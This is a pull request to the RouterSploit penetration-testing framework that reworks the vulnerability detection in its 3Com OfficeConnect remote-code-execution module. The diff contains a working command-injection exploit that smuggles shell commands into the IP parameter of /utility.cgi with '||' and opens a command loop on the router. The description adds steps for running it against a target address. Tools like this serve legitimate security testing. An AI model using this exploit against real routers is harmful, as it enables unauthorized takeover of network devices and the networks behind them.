### PR TITLE
Fixing false positive - 3com officeconnect rce

### DIFF
--- a/routersploit/modules/exploits/routers/3com/officeconnect_rce.py
+++ b/routersploit/modules/exploits/routers/3com/officeconnect_rce.py
@@ -23,13 +23,28 @@ class Exploit(HTTPClient):
     port = OptPort(80, "Target HTTP port")
 
     def run(self):
-        if self.check():
-            print_success("Target is vulnerable")
-            print_status("Invoking command loop...")
-            print_status("It is blind command injection - response is not available")
-            shell(self, architecture="mipsbe")
+        response1 = self.http_request(
+            method="GET",
+            path="/utility.cgi?testType=1&IP=aaa",
+        )
+
+        if response1 and response1.status_code == 200:
+            path = "/{}.cgi".format(utils.random_text(32))
+
+            response2 = self.http_request(
+                method="GET",
+                path=path,
+            )
+
+            if not response2 or response1.text != response2.text:
+                print_success("Target appears to be vulnerable")
+                print_status("Invoking command loop...")
+                print_status("It is blind command injection - response is not available")
+                shell(self, architecture="mipsbe")
+            else:
+                print_error("Exploit failed - target does not seem to be vulnerable")
         else:
-            print_error("Target is not vulnerable")
+            print_error("Exploit failed - target does not seem to be vulnerable")
 
     def execute(self, cmd):
         path = "/utility.cgi?testType=1&IP=aaa || {}".format(cmd)
@@ -42,21 +57,4 @@ class Exploit(HTTPClient):
 
     @mute
     def check(self):
-        response1 = self.http_request(
-            method="GET",
-            path="/utility.cgi?testType=1&IP=aaa",
-        )
-        if response1 is None:
-            return False  # target is not vulnerable
-
-        if response1.status_code == 200:
-            path = "/{}.cgi".format(utils.random_text(32))
-
-            response2 = self.http_request(
-                method="GET",
-                path=path,
-            )
-            if response2 is None or response1.text != response2.text:
-                return True  # target is vulnerable
-
-        return False  # target is not vulnerable
+        return None  # there is no reliable way to check if target is vulnerable


### PR DESCRIPTION
## Status
**READY**

## Description
This PR fixes 3Com OfficeConnect RCE false positive. It resolves #503 and #493 

## Verification
Provide steps to test or reproduce the PR.
 1. Start `./rsf.py`
 2. `use exploits/routers/3com/officeconnect_rce`
 3. `set target 192.168.1.1`
 4. `run`

## Checklist
- [x] Fix issue
